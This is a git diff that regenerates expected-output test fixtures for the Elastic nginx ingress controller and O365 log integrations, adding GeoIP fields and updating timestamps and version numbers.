"2020-02-07T11:56:56.000Z", "ecs": { "version": "1.12.0" @@ -1340,8 +1342,24 @@ "status_code": 200 } }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:41:46.110226700Z", + "ingested": "2021-12-14T14:48:38.075895580Z", "original": "67.43.156.13 - - [07/Feb/2020:11:56:56 +0000] \"GET /v2 HTTP/1.1\" 200 61 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15\" 360 0.002 [default-web2-8080] [] 172.17.0.6:8080 61 0.002 200 0a2a92d080e664dd4e95c85d097c9d3d", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -1365,7 +1383,13 @@ "name": "Mac" }, "version": "13.0.5" - } + }, + "url": { + "original": "/v2" + }, + "tags": [ + "preserve_original_event" + ] }, { "nginx_ingress_controller": { @@ -1393,16 +1417,6 @@ } } }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" - }, - "url": { - "original": "/favicon.ico" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-02-07T11:56:56.000Z", "ecs": { "version": "1.12.0" @@ -1425,8 +1439,24 @@ "status_code": 200 } }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:41:46.110231600Z", + "ingested": "2021-12-14T14:48:38.075895955Z", "original": "67.43.156.13 - - [07/Feb/2020:11:56:56 +0000] \"GET /favicon.ico HTTP/1.1\" 200 59 \"http://hello-world.info/v2\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15\" 316 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 4c024ebfc20acfb2d59e542e3ed60789", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -1450,7 +1480,13 @@ "name": "Mac" }, "version": "13.0.5" - } + }, + "url": { + "original": "/favicon.ico" + }, + "tags": [ + "preserve_original_event" + ] }, { "nginx_ingress_controller": { @@ -1478,16 +1514,6 @@ } } }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" - }, - "url": { - "original": "/products/42?address=delhi+technological+university" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-02-07T12:00:28.000Z", "ecs": { "version": "1.12.0" @@ -1509,8 +1535,24 @@ "status_code": 200 } }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:41:46.110236800Z", + "ingested": "2021-12-14T14:48:38.075896332Z", "original": "67.43.156.13 - - [07/Feb/2020:12:00:28 +0000] \"GET /products/42?address=delhi+technological+university HTTP/1.1\" 200 59 \"-\" \"python-requests/2.22.0\" 197 0.000 [default-web-8080] [] 172.17.0.5:8080 59 0.001 200 9a7babf34ca4ee59d90ac48d452a9214", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -1529,7 +1571,13 @@ "name": "Other" }, "version": "2.22" - } + }, + "url": { + "original": "/products/42?address=delhi+technological+university" + }, + "tags": [ + "preserve_original_event" + ] }, { "nginx_ingress_controller": { @@ -1557,16 +1605,6 @@ } } }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" - }, - "url": { - "original": "/v2" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-02-07T12:02:38.000Z", "ecs": { "version": "1.12.0" @@ -1588,8 +1626,24 @@ "status_code": 200 } }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:41:46.110343100Z", + "ingested": "2021-12-14T14:48:38.075896706Z", "original": "67.43.156.13 - - [07/Feb/2020:12:02:38 +0000] \"GET /v2 HTTP/1.1\" 200 61 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\" 343 0.000 [default-web2-8080] [] 172.17.0.6:8080 61 0.001 200 ba91c30454893c121879396b0a78be79", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -1613,7 +1667,13 @@ "name": "Mac" }, "version": "72.0." - } + }, + "url": { + "original": "/v2" + }, + "tags": [ + "preserve_original_event" + ] }, { "nginx_ingress_controller": { @@ -1641,16 +1701,6 @@ } } }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" - }, - "url": { - "original": "/favicon.ico" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-02-07T12:02:38.000Z", "ecs": { "version": "1.12.0" @@ -1672,8 +1722,24 @@ "status_code": 200 } }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:41:46.110350500Z", + "ingested": "2021-12-14T14:48:38.075897079Z", "original": "67.43.156.13 - - [07/Feb/2020:12:02:38 +0000] \"GET /favicon.ico HTTP/1.1\" 200 59 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\" 262 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 98c81aa2d50c67f6fb1fa16d5ce62f8f", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -1697,7 +1763,13 @@ "name": "Mac" }, "version": "72.0." - } + }, + "url": { + "original": "/favicon.ico" + }, + "tags": [ + "preserve_original_event" + ] }, { "nginx_ingress_controller": { @@ -1725,16 +1797,6 @@ } } }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" - }, - "url": { - "original": "/v2/some" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-02-07T12:02:42.000Z", "ecs": { "version": "1.12.0" @@ -1756,8 +1818,24 @@ "status_code": 200 } }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:41:46.110356700Z", + "ingested": "2021-12-14T14:48:38.075897490Z", "original": "67.43.156.13 - - [07/Feb/2020:12:02:42 +0000] \"GET /v2/some HTTP/1.1\" 200 61 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\" 348 0.001 [default-web2-8080] [] 172.17.0.6:8080 61 0.000 200 835136ae24486dbb4156dcbe21f5d402", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -1781,7 +1859,13 @@ "name": "Mac" }, "version": "72.0." - } + }, + "url": { + "original": "/v2/some" + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/nginx_ingress_controller/data_stream/error/_dev/test/pipeline/test-error-raw.log-expected.json b/packages/nginx_ingress_controller/data_stream/error/_dev/test/pipeline/test-error-raw.log-expected.json index 49a8aec4396..f80cce5ef48 100644 --- a/packages/nginx_ingress_controller/data_stream/error/_dev/test/pipeline/test-error-raw.log-expected.json +++ b/packages/nginx_ingress_controller/data_stream/error/_dev/test/pipeline/test-error-raw.log-expected.json @@ -19,7 +19,7 @@ }, "message": "Expected to load root CA config from /var/run/secrets/kubernetes.io/serviceaccount/ca.crt, but got err: open /var/run/secrets/kubernetes.io/serviceaccount/ca.crt: no such file or directory", "event": { - "ingested": "2021-12-09T13:41:49.163645200Z", + "ingested": "2021-12-14T14:48:41.462295829Z", "original": "E1215 04:15:13.816036 8 config.go:489] Expected to load root CA config from /var/run/secrets/kubernetes.io/serviceaccount/ca.crt, but got err: open /var/run/secrets/kubernetes.io/serviceaccount/ca.crt: no such file or directory", "timezone": "GMT+1", "created": "2020-12-16T11:39:15.954Z", @@ -54,7 +54,7 @@ }, "message": "\"Creating API client\" host=\"https://127.0.0.1:443\"", "event": { - "ingested": "2021-12-09T13:41:49.163654300Z", + "ingested": "2021-12-14T14:48:41.462298677Z", "original": "I1215 14:15:13.816067 8 main.go:236] \"Creating API client\" host=\"https://127.0.0.1:443\"", "timezone": "GMT+1", "created": "2020-12-16T11:39:15.954Z", @@ -89,7 +89,7 @@ }, "message": "\"Trying to discover Kubernetes version\"", "event": { - "ingested": "2021-12-09T13:41:49.163660600Z", + "ingested": "2021-12-14T14:48:41.462299155Z", "original": "I1215 14:15:13.816334 8 main.go:256] \"Trying to discover Kubernetes version\"", "timezone": "GMT+1", "created": "2020-12-16T11:39:15.954Z", @@ -124,7 +124,7 @@ }, "message": "Response Headers:", "event": { - "ingested": "2021-12-09T13:41:49.163666700Z", + "ingested": "2021-12-14T14:48:41.462299660Z", "original": "I1215 14:15:13.816854 8 round_trippers.go:449] Response Headers:", "timezone": "GMT+1", "created": "2020-12-16T11:39:15.954Z", @@ -159,7 +159,7 @@ }, "message": "Error while initiating a connection to the Kubernetes API server. This could mean the cluster is misconfigured (e.g. it has invalid API server certificates or Service Accounts configuration). Reason: Get \"https://127.0.0.1:443/version?timeout=32s\": dial tcp 127.0.0.1:443: connect: connection refused\nRefer to the troubleshooting guide for more information: https://kubernetes.github.io/ingress-nginx/troubleshooting/\ngoroutine 1 [running]:\nk8s.io/klog/v2.stacks(0xc00000e001, 0xc0004fc6c0, 0x1cd, 0x228)\n\tk8s.io/klog/v2@v2.3.0/klog.go:996 +0xb9\nk8s.io/klog/v2.(*loggingT).output(0x28fb700, 0xc000000003, 0x0, 0x0, 0xc000344770, 0x28499eb, 0x7, 0x126, 0x0)\n\tk8s.io/klog/v2@v2.3.0/klog.go:945 +0x191\nk8s.io/klog/v2.(*loggingT).printf(0x28fb700, 0x3, 0x0, 0x0, 0x1c19509, 0x13f, 0xc00009ff08, 0x1, 0x1)\n\tk8s.io/klog/v2@v2.3.0/klog.go:733 +0x17a\nk8s.io/klog/v2.Fatalf(...)\n\tk8s.io/klog/v2@v2.3.0/klog.go:1463\nmain.handleFatalInitError(...)\n\tk8s.io/ingress-nginx/cmd/nginx/main.go:294\nmain.main()\n\tk8s.io/ingress-nginx/cmd/nginx/main.go:78 +0x32f\n\ngoroutine 6 [chan receive]:\nk8s.io/klog/v2.(*loggingT).flushDaemon(0x28fb700)\n\tk8s.io/klog/v2@v2.3.0/klog.go:1131 +0x8b\ncreated by k8s.io/klog/v2.init.0\n\tk8s.io/klog/v2@v2.3.0/klog.go:416 +0xd8", "event": { - "ingested": "2021-12-09T13:41:49.163672700Z", + "ingested": "2021-12-14T14:48:41.462300074Z", "original": "F1215 14:16:33.326604 8 main.go:294] Error while initiating a connection to the Kubernetes API server. This could mean the cluster is misconfigured (e.g. it has invalid API server certificates or Service Accounts configuration). Reason: Get \"https://127.0.0.1:443/version?timeout=32s\": dial tcp 127.0.0.1:443: connect: connection refused\nRefer to the troubleshooting guide for more information: https://kubernetes.github.io/ingress-nginx/troubleshooting/\ngoroutine 1 [running]:\nk8s.io/klog/v2.stacks(0xc00000e001, 0xc0004fc6c0, 0x1cd, 0x228)\n\tk8s.io/klog/v2@v2.3.0/klog.go:996 +0xb9\nk8s.io/klog/v2.(*loggingT).output(0x28fb700, 0xc000000003, 0x0, 0x0, 0xc000344770, 0x28499eb, 0x7, 0x126, 0x0)\n\tk8s.io/klog/v2@v2.3.0/klog.go:945 +0x191\nk8s.io/klog/v2.(*loggingT).printf(0x28fb700, 0x3, 0x0, 0x0, 0x1c19509, 0x13f, 0xc00009ff08, 0x1, 0x1)\n\tk8s.io/klog/v2@v2.3.0/klog.go:733 +0x17a\nk8s.io/klog/v2.Fatalf(...)\n\tk8s.io/klog/v2@v2.3.0/klog.go:1463\nmain.handleFatalInitError(...)\n\tk8s.io/ingress-nginx/cmd/nginx/main.go:294\nmain.main()\n\tk8s.io/ingress-nginx/cmd/nginx/main.go:78 +0x32f\n\ngoroutine 6 [chan receive]:\nk8s.io/klog/v2.(*loggingT).flushDaemon(0x28fb700)\n\tk8s.io/klog/v2@v2.3.0/klog.go:1131 +0x8b\ncreated by k8s.io/klog/v2.init.0\n\tk8s.io/klog/v2@v2.3.0/klog.go:416 +0xd8", "timezone": "GMT+1", "created": "2020-12-16T11:39:15.954Z", @@ -194,7 +194,7 @@ }, "message": "curl -k -v -XGET -H \"Authorization: Bearer token\" -H \"Accept: application/json, */*\" -H \"User-Agent: nginx-ingress-controller/v0.40.2 (linux/amd64) ingress-nginx/fc4ccc5eb0e41be2436a978b01477fc354f31643\" 'https://127.0.0.1:443/version?timeout=32s'", "event": { - "ingested": "2021-12-09T13:41:49.163677500Z", + "ingested": "2021-12-14T14:48:41.462300498Z", "original": "I1215 14:15:13.816598 8 round_trippers.go:423] curl -k -v -XGET -H \"Authorization: Bearer token\" -H \"Accept: application/json, */*\" -H \"User-Agent: nginx-ingress-controller/v0.40.2 (linux/amd64) ingress-nginx/fc4ccc5eb0e41be2436a978b01477fc354f31643\" 'https://127.0.0.1:443/version?timeout=32s'", "timezone": "GMT+1", "created": "2020-12-16T11:39:15.954Z", @@ -229,7 +229,7 @@ }, "message": "GET https://127.0.0.1:443/version?timeout=32s in 0 milliseconds", "event": { - "ingested": "2021-12-09T13:41:49.163682400Z", + "ingested": "2021-12-14T14:48:41.462300912Z", "original": "I1215 14:15:13.816837 8 round_trippers.go:443] GET https://127.0.0.1:443/version?timeout=32s in 0 milliseconds", "timezone": "GMT+1", "created": "2020-12-16T11:39:15.954Z", diff --git a/packages/nginx_ingress_controller/manifest.yml b/packages/nginx_ingress_controller/manifest.yml index 5f79dcb9202..42bd7f7bbe1 100644 --- a/packages/nginx_ingress_controller/manifest.yml +++ b/packages/nginx_ingress_controller/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: nginx_ingress_controller title: Nginx Ingress Controller Logs -version: 1.2.1 +version: 1.2.2 license: basic description: Collect and parse logs from Nginx Ingress Controller instances with Elastic Agent. type: integration diff --git a/packages/o365/changelog.yml b/packages/o365/changelog.yml index 5d15fe3dcad..fdc1609d7de 100644 --- a/packages/o365/changelog.yml +++ b/packages/o365/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.3.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.3.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-events.json-expected.json index 5a574c2ea18..46bd6a40a69 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-events.json-expected.json @@ -2,6 +2,18 @@ "expected": [ { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -146,7 +158,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124815300Z", + "ingested": "2021-12-14T14:48:43.176631497Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1037807Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438635\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"8f6eb24b-6e61-4ee2-a376-31368c300613\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -173,6 +185,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -317,7 +341,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124825700Z", + "ingested": "2021-12-14T14:48:43.176635114Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1037807Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438635\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"8f6eb24b-6e61-4ee2-a376-31368c300613\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n 